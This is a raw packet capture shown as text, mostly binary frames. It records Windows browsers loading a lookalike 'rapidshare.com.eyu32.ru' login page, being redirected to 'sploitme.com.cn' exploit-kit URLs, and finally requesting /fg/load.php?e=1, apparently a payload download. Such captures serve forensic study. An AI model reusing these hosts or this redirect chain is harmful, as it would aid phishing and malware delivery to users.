ò;=K VV'DEHR8TDC4k$R'DcSc5t='D 8fd12edd2dc1462<MSFT 5.07 ,./!+;=K NN'DRT5E@@`  CD,;$$R  'DcSc5  3Q6 ;=K pp'DEbS89DCN$R'DcSc5='D2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+;=Ka NN'DRT5E@@`  CD,,$R   'DcSc5  3Q6 ;=K6 <<'D'D  ;=K<<'D'D  $R;=K<<'D'D  $R ;=KYnn'DE`V *  Lou) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA    ;=K)<<^'DF(W7T " ;=KŞRR'DRT5ED   F(W7T " ;=KZ nn'DE`Y '  Lou) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA    ;=K.<<^'DF(Z7Q " DIEGE ;=KRR'DRT5ED   F(Z7Q "!;=Knn'DE`[ %  Lou) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ";=K[nn'DE`\ $  Lpu( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   #;=Krnn'DE`] #  Lr) FHEPFCELEHFCEPFFFACACACACACACAAA   #;=K nn'DE`_ !  Lr) FHEPFCELEHFCEPFFFACACACACACACAAA   $;=K3 nn'DE``  Lr) FHEPFCELEHFCEPFFFACACACACACACAAA   %;=K,knn'DE`a   Lr( FHEPFCELEHFCEPFFFACACACACACACAAA   %;=KA<<'D'D  %;=K**'DRT5RT5 'D %;=K">>RT5'DE0j@t 82'P p{%;=K ::'DRT5E,@u82 P' `Y%;=K+%<<RT5'DE(k@{ 82'P P.%&;=KiRT5'DEl@ 82'P P*GET /login.php HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive &;=K>766'DRT5E(@u82 P' NP'&;=KV'DRT5E@p982 P' NP'ZHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1508 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Vmo6_jl![ǒI 5)-֒RT7QcC ~ɻ{Ew :ys޽!n5e88D7%S8_,dw<j:HTbŝP]edJ[׃?r 'I#maJqw:BTFX:Œ;YtRbz Tad]b5ㅢro6Z4RNyF-.u&2H+VH,JhR,&eiTEd/ie ̀[ӄa!_O<7>a>^-^pΓ j)[UA>Oҹ9q%UUO&;s둈؉k%!փ B6 푃9!jag@RpОosNYt>Ff=]Eͣ[0~|83}K0%aCx4k.D^ˮӯ%J~^ٳ>;==o?}dO>X{ܣ33'oW } C{ac З :CE9ΰ%P'[Ԛ9Xc r+/=gs?ѡz4ңW:HCsP/tJupONL%STW- TRHGzh'?禗 &;=K ^<<RT5'DE(m@y 82'P N P%&;=K8nn'DE`p   Loq ) 
DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   &;=Kvnn'DE`q   Lo!) FHEPFCELEHFCEPFFFACACACACACACABO   &;=K%%RT5'DEt@ 82'P N PGET /images/sslstyles.css HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php If-Modified-Since: Tue, 02 Feb 2010 17:38:05 GMT If-None-Match: "5e472-fef-47ea19070f940" &;=K66'DRT5E(@u82 P' =P&;=K'DRT5E @t82 P' =P[HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "5e472-fef-47ea19070f940" &;=KfRT5'DEy@ 82'P=PGET /images/images/dot.jpg HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/images/sslstyles.css &;=K866'DRT5E( @u82 P'P&;=K7yy'DRT5Ek @s82 P'PŶHTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 276 Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPMO@WNH4lP Bql ݖx{3o^vV~9,˷5j1*/r~d,E7#p훣HbN`c<,Lh pިsv"Jx'JM`'`y wmx$Qu%8vE*e9Jf,cpۇև;(>Fj:@MNqu;."`eW+%V9>RT5'DE0@[ 84(PIoyp&;=KQJ::'DRT5E, @u84 P( Ioz`&;=K0M<<RT5'DE(@_ 84(PIoz P&;=KTRT5'DE@ 84(PIoz PIaGET /?click=3feb5a6b2f HTTP/1.1 Host: sploitme.com.cn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php &;=K22RT5'DE$@\ 82'PEPGET /images/rslogo.jpg HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php If-Modified-Since: Tue, 02 Feb 2010 10:31:49 GMT If-None-Match: "5e46b-6825-47e9b9bfe2f40" &;=K66'DRT5E( @u84 P( Io/P&;=K 66'DRT5E(@u82 P'EP&;=K~>>RT5'DE0@C 82)P핗p&;=Kc>>RT5'DE0@B 82*Pspc&;=K'DRT5E@s84 P( Io/PHTTP/1.1 302 Found Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Location: http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html &;=Kf'DRT5E @t82 P'EP_yHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=97 ETag: "5e46b-6825-47e9b9bfe2f40" &;=Kd::'DRT5E,@u82 P* s``&;=K::'DRT5E,@u82 P) 핗`Qo&;=K}<<RT5'DE(@I 82*Ps P,&;=K<<RT5'DE(@H 82)P핗 Pn;&;=KRT5'DE@ 82*Ps P.GET /images/images/terminator_back.png HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/images/sslstyles.css &;=K66'DRT5E(@u82 P* uPc&;=KRT5'DE@ 82)P핗 P6GET /images/images/terminatr_back.png HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/images/sslstyles.css &;=K66'DRT5E(@u82 P) 학[Pgs&;=KRT5'DE@ 84(PIo/ P8GET /fg/show.php?s=3feb5a6b2f HTTP/1.1 Host: sploitme.com.cn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php &;=K66'DRT5E(@u84 P( IoP/&;=KĚ'DRT5Eu@s82 P* uPHTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:13 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 285 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPN0+Po Ɋ}J =pBn㤪eW3;Y~5{Vz5q5jvl8  H*ƣ1llFr<~f&;=Kl<<RT5'DE(@4 82'P(P&;=K]'DRT5E@p%84 P( IoPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:13 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1666 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html WksFLckvWOlCû ---8HA${]B>!HwsGӫ7<|ӹsw;#ϻ{8aOwgWvx=oE;U~\dM}X]g^WmQnUQVne.f8ֹUog7qꉻa}N 
ްw2;XNS8r=xYo'o7Ya&8\,©+]gS4E3z'yS:|Yd{iT6{ļ:]9g\VymkE2/_͵oܼu{<=xO??%?O^7v{3_iQ/ y}T\[ly[UN{mכmjbdjEs1\/3"~2YMqE_љ?J_ ^x/߼s'oVSk.er?#.㱔F9z/ם016_cgcҔt|ҳY : 4f6rj38BgWe/x\\ݫY@?kW\3a3_nE oOIS@UɇeOjf[ďzDw? h.ݾ<3"fYT=p0|(֛|Rց Oi([>PX~H;hLQfo. +zCv3KE™-l^VE-ixƆ®+Ťʁ#/.}9T^l-~;f}Ͼˑ>(̛R]Vj/uo/TD$F4TaLH%R1ُT(U_80IBIBTViTEkU+ߨC5FOWi8 * 0Sǿ~OPa GZ>RHHUC 6L$J+bRax%""681&;=K'DRT5E@sg84 P( ˆIoP0LH,C@[YĮ H?6 SaD/ď&D킔4=`!0"PVӤЗ:j)rg`  A`lp`! IɃCA)/BO{#JXP5cDPsyi`"hF%u[$iC:* ވBERk؈fu0|oIbs"ieE>> Kpj(C:A] --iY#mk@:4`|WQ/KdI R,$cfvJN"#m *Bq PP*o+e,(s#D6,wY,"2$B[qRr= 6P8v/K/ 9dkE\g{2/ &VKw[B6 uiL%d yHne&+_?fv6/ ijQV P.dM"6T qyQ5fذncuY8#6"2)z9f7%y'"yV,AtqnP5LBgP-@:_+;7cUwSq!~~ $1 &;=K<<RT5'DE(@1 84(PIo P1&;=K<<RT5'DE(@0 82*Pu OPr&;=K <<RT5'DE(@/ 82)P학[ OPl&;=KФ RT5'DE@ 82'P(PjGET /favicon.ico HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive &;=Kr 66'DRT5E(@u82 P'(MPo&;=K uu'DRT5Eg@s82 P'(MP;HTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:13 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 272 Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPj0+9h] -A;$&=*ꑐPe`fgvwn|% ,a6Gܔ h$#)b*:2$x폒i[aeB/(Ąd{#cDЁ5J?A:/ugz.AC1'YZBq\+coČd}}xz]s,LRNp^WP~^sE6A 3'")#6@mXr oI~JQ&;=K <<RT5'DE(@' 82'PMgP?&;=K0 nn'DE`  Loq ) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   &;=KP3 nn'DE`  Lo!) FHEPFCELEHFCEPFFFACACACACACACABO   ';=KRT nn'DE`  Loq ) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ';=KxW nn'DE`  Lo!) 
FHEPFCELEHFCEPFFFACACACACACACABO   (;=K9nn'DE`  Lpq ( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   (;=K5nn'DE`  Lo!( FHEPFCELEHFCEPFFFACACACACACACABO   );=K>'DEB  | "  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462);=K<'DE2  M #  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U*;=Klf 'DE?  | %  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462,;=K9'DE>  | &  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462-;=K9<<RT5'DE(@ 82'PMgP>-;=K49<<RT5'DE(@ 82*Pu OPq-;=K966'DRT5E(@u82 P'gNP/-;=K966'DRT5E(@u82 P* OuP-;=Kq><<RT5'DE(@ 82)P학[ OPl-;=K>66'DRT5E(@u82 P) O학\Pe%-;=K?<<RT5'DE(@ 84(PIo P0-;=K?66'DRT5E(@u84 P( IoP !-;=KoC66'DRT5E( @u82 P) O학\Pe$-;=K"F66'DRT5E(!@u82 P* OuP-;=KH66'DRT5E("@u82 P'gNP.-;=KGJ<<RT5'DE(@ 82)P학\ PPl-;=KrK<<RT5'DE(@ 82*Pu PPp-;=K0L<<RT5'DE(@ 82'PNhP=-;=KS66'DRT5E(#@u84 P( IoP -;=KW<<RT5'DE(@ 84(PIo P/-;=K 'DE$  |'  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462/;=Ka'DE  μ(  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC14620;=K'DE  μ)  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC14621;=K'DE  μ*  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC14622;=K 'DE  μ+  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;;=K VV' EH7DC4' cSc5t='  8fd12edd2dc1462<MSFT 5.07 ,./!+;;=Kߗ NN' RT5E@@^  CD,w[  ' cSc5  3Q6 ;;=K; pp' Eb7DCNV' cSc5=' 2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+;;=K NN' RT5E@@^  CD,gL   ' cSc5  3Q6 ;;=K <<' '   <;=Kc<<' '   =;=Kr<<' '   >;=Knn' E`  Llc0) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   >;=K<<^' F(5 ">;=KRR' RT5ED   F(5 ">;=K(nn' E`  Llc0) 
DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ?;=K<<^' F(5 " DIEGE?;=KpRR' RT5ED   F(5 "?;=K\ nn' E`  Llc0) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   @;=Knn' E`  Lmc0( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   A;=Kڽnn' E`  L`1) FHEPFCELEHFCEPFFFACACACACACACAAA   A;=K3nn' E`  L`1) FHEPFCELEHFCEPFFFACACACACACACAAA   B;=K0g nn' E`  L`1) FHEPFCELEHFCEPFFFACACACACACACAAA   C;=K+nn' E`  L`1( FHEPFCELEHFCEPFFFACACACACACACAAA   D;=K?nn' E`  Ll_2) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   D;=Knn' E`  L]3) FHEPFCELEHFCEPFFFACACACACACACABO   D;=KA<<' '   D;=KD**' RT5RT5 '  D;=K>RT5' E0@ 828Pa-p=D;=KN::' RT5E,@t82 P8 a-`D;=Kj<<RT5' E(@ 828Pa- P*D;=K5xffRT5' EX@ 828Pa- PGET /login.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive D;=Kx66' RT5E(@t82 P8 a.OP$D;=Kt' RT5E@o-82 P8 a.OP'HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1508 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Vmo6_jl![ǒI 5)-֒RT7QcC ~ɻ{Ew :ys޽!n5e88D7%S8_,dw<j:HTbŝP]edJ[׃?r 'I#maJqw:BTFX:Œ;YtRbz Tad]b5ㅢro6Z4RNyF-.u&2H+VH,JhR,&eiTEd/ie ̀[ӄa!_O<7>a>^-^pΓ j)[UA>Oҹ9q%UUO&;s둈؉k%!փ B6 푃9!jag@RpОosNYt>Ff=]Eͣ[0~|83}K0%aCx4k.D^ˮӯ%J~^ٳ>;==o?}dO>X{ܣ33'oW } C{ac З :CE9ΰ%P'[Ԛ9Xc r+/=gs?ѡz4ңW:HCsP/tJupONL%STW- TRHGzh'?禗 D;=K[<<RT5' E(@ 828Pa.O P"D;=K RT5' E@i 828Pa.O P]GET /images/sslstyles.css HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 02 Feb 2010 10:31:49 GMT If-None-Match: "5e46c-1061-47e9b9bfe2f40" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive 
D;=Kʏ 66' RT5E(@t82 P8 a/PD;=K) ' RT5E @o*82 P8 a/P]%HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Last-Modified: Tue, 02 Feb 2010 17:38:05 GMT ETag: "5e472-fef-47ea19070f940" Accept-Ranges: bytes Content-Length: 4079 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/css body { margin: 0; padding: 0; color: white; background: url(./images/dot.jpg); font: 9pt Arial, sans-serif; } #wrapper { background: #ffffff; color: black; margin: 20px auto 0 auto; padding: 0px; border: 1px solid #000000; width: 900px; } #footer { font-size: 10px; text-align: center; margin: 10px auto 10px auto; } #terminator { background: url(./images/terminator_back.png) repeat-x; height: 15px; margin: 0 0 0 0; border: 0; } #header { border-bottom: 1px solid #000000; margin: 0px; height: 185px; } #header .left { background: #ACC4CE url(./images/back_left.jpg); width: 100px; float: left; height: 136px; margin: 0px; } #header .right { background: #ACC4CE url(./images/back_right.jpg); width: 800px; float: left; margin: 0x; height: 136px; padding: 0px; } #header-bottom { border-top: 0; border-bottom: 0; background: #ffffff; margin: 0 0 0 0; } #main { position: relative; margin: 10px; } #content { margin: 0 0 0 0; border-style: none; border-width: 0 0px 0px 0; background: white; color: black; } #content .inner { margin: 0px 0px 0px 0px; } #content .inner a { color: #0B7D;=K~ ' RT5E @o)82 P8 Ԏa/PBCC; text-decoration: underline; } #content .inner a:hover { color: #0B7BCC; text-decoration: none; } #content .inner h2 { color: #245185; padding-bottom: 0.2em; border-bottom: 1px solid #b9d2e3; font-size: 120%; } #content .inner h3 { font-size: 130%; } #content .inner p { color: #666666; font-size: 100%; } #content .inner hr { background-color: #444444; height: 1px; margin: 2px; border: 0; } #content .inner textarea { font-size:9px; font-family:Verdana, Arial, Helvetica, sans-serif; } ul.dropdown { list-style: 
none; margin:0; padding:0; width:100%; } ul.dropdown * ul { list-style: none; margin:0; padding: 0; display:none; position:absolute; z-index:99; } ul.dropdown li { float: left; padding: 0px; /* padding: 2px; helps Opera with hover */ } ul.dropdown li * li { float: none; position: relative; } ul.dropdown ul * ul { left:98%; top:0; width:100%; } ul.dropdown a { display:block; } ul.dropdown ul * a { width:20em; } ul.dropdown li:hover ul ul, ul.dropdown li:hover ul ul ul, ul.dropdown li:hover ul ul ul ul { display:none; } ul.dropdown li:hover ul, ul.dropdown ul li:hover ul, ul.dropdown ul ul li:hover ul { display:block; } ul.dropdown a { background-color: #666666; color: #fff; padding: 2px 9px 2px 9px; text-decoration: none; } ul.dropdown a:hover { background-color: #444; color: #fff; } ul.dropdown ul { border: 0; background-color: #ccc; } ul.dropdown ul a { background-color: #ccc; coloD;=K ' RT5E @oL82 P8 ֈa/Plpr: #000; padding: 4px; text-decoration: none; } ul.dropdown ul a:hover { background-color: #E1E1E1; color: #000; } ul.dropdown ul li { background-color: #ccc; } ul.dropdown hr { background-color: #444444; height: 1px; margin: 3px; border: 0; } #mainmenu { background: url(./images/terminatr_back.png) #666666 repeat-x; height: 20px; } input, textarea { margin-right: 10px; margin-top: 4px; font: normal 11px verdana, arial, geneva, helvetica, sans-serif; } form { line-height: 150%; } #uploadfield { margin: 20px auto 10px auto; padding: 0px; width: 800px; } #premiumloginform { margin: 20px auto 10px auto; padding: 0px; width: 200px; } #freefoldersform { margin: 20px auto 10px auto; padding: 0px; width: 540px; } #premiumtable { border-left: 1px solid #BFBFBF; border-bottom: 1px solid #BFBFBF; margin: 20px auto 10px auto; padding: 0px; width: 600px; } #premiumtable2 { border-left: 1px solid #BFBFBF; border-bottom: 1px solid #BFBFBF; margin: 20px auto 10px auto; padding: 0px; width: 700px; } #premiumtable td { border-right: 1px solid #BFBFBF; border-top: 1px solid 
#BFBFBF; } #premiumtable2 td { border-right: 1px solid #BFBFBF; border-top: 1px solid #BFBFBF; } #content .inner .resellergroup { color: #245185; padding: 10px; border-top: 2px solid #cccccc; font-size: 120%; font-weight: bold; margin: 10px; } #content .inner .resellergroup .reseller { color: #666666; fD;=K` <<RT5' E(@ 828Pa/ ֈPD;=K <<RT5' E( @ 828Pa/ P`D;=K% ww' RT5Ei @t82 P8 a/Pont-size: 90%; margin: 10px 10px 20px; font-weight: normal; } D;=K <<RT5' E( @ 828Pa/ YPD;=KX >>RT5' E0 @ 849PT/>pD;=K ::' RT5E, @t84 P9 T/?`KD;=K RT5' E @e 828Pa/ YPGET /images/rslogo.jpg HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 02 Feb 2010 10:31:49 GMT If-None-Match: "5e46b-6825-47e9b9bfe2f40" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive D;=Kf 66' RT5E(@t82 P8 Ya1:P eD;=Kv <<RT5' E(@ 849PT/? PhwD;=KN ' RT5E @s82 P8 Ya1:PM%HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=98 ETag: "5e46b-6825-47e9b9bfe2f40" D;=K QQRT5' EC@ 828Pa1: >RT5' E0@ 82:PyP:pD;=K ::' RT5E,@t82 P: yP;`D;=K <<RT5' E(@ 82:PyP; PD;=KP yy' RT5Ek@r82 P8 Fj:@MNqu;."`eW+%V9fD;=K' RT5Et@r82 P8 a3|PM7HTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 285 Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPN0+Po Ɋ}J =pBn㤪eW3;Y~5{Vz5q5jvl8  H*ƣ1llFr<~{9:~G_??{L&Gz'qbb>{7rl>^=YmNW|_˧of$F6V˧(w'\wOn=%ɵ'/O>M'Wo_<4͟YyF̮FKY KVbq5_ׇǓ粢yu^<ߌ.g|ً٧oql=z?Z/g:哝/f<|{ɧ?gON/_}}lz7~S.tgtttX-wכ+auӝ#uzyi<x}1uG\gt;>;_}1b蛋|wq_Η盋+?MC3lfw7a?sN0t;?>[89IwIݨw(74@'óCP< }sZ~kQ^=J~y9k_*vh=. 
CG~mrq3vE"n{{pv 8>+7}r˫H^==ݏaӂd]ޗVHE;=KZs' RT5E@o84 P9 ŒT2 Pg"UO+ɗb["RPC/%I)-߹$P\?Kn3AX#qpz!o vԋ~YOUp$fu6^u\fBZ >sg,T "~hN ȰUS:xʫ/5Ȋ r0cȰSd¸(OiAx\VWw7 MG \- ,C"bV6qb qWg,;F(W E4x!hy xqVedf,GVnD@FE;=Ks' RT5E@o984 P9 FT2 PHn( l۳ib9 ŏYGA/Kn8TXX!ʬnK$ma&zg}زQVTfyߝx͛֍L"S/S &%}P6(ѱW:SZ` Gz=o,P7' eKF2(FPCpM$m,;jI6ZJȌȇ{aWc(kE) . &wcYalQ4XPVdVh 4W_({9B=V~9uvtAuѫEx-IEoDQ's&5z#Cn IHֽ.^%ȆrVGyVס|ڐa2z2U^l: 1Y+p6}hrB.UȽUr *P0z}_eY} ?eYpkgDЋ8A*-Z;/'3Kym3isy3&!*7ԽHߚYaF^O%*hSNjUcf&uc g%'=KRMhEVcMۉJJlhPýU9,klÔ3r" $էdQP!gΎ*m$6fmVX}A"8h"ڙ3 sZ~2sfljpeX`Llˍ0sa*2MZL6ugo9![kc:_8Y%p68Cg7c2'0PJ`d,#N+^%Va'_XGa.JY})6` FCu˜:xP'/$ΐlB!ʢ0:؁٭)Kꌣ`yEmF+5P=A'v٬3YC02 >d;US&WA$8r/̆E1+R쐧]Q'휣4pg| B'B4shc!T֙c3,1`N)kd_q-ABpثPa=ltfc=cy0G{dl͕*DpbCiq(oaH{$Z_/FeL2 F&48k idrki 8%ϓOyη`qlo9;5G5/x~o%Js.ga!ͱ&Qmjl=kcq aZ'}|k74fsE;=K<<RT5' E( @ 849PT2 FPXfE;=K<<RT5' E(!@ 849PT2 P`XfE;=KLL' RT5E>@r84 P9 T2 P!lR=pVp櫉RF/eo{Vatц9Ӎ9ͩZuaq`X5%%d%Ryg<>zdrpi%uǓW<pO"]*E;=K0<<RT5' E("@ 849PT2 PPE;=K nn' E`#]  Ll_2) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   E;=KK nn' E`$\  L]3) FHEPFCELEHFCEPFFFACACACACACACABO   F;=KJJRT5' E<%@ 849PT2 PZGET /fg/load.php?e=1 HTTP/1.1 Accept: */* Accept-Language: en-us 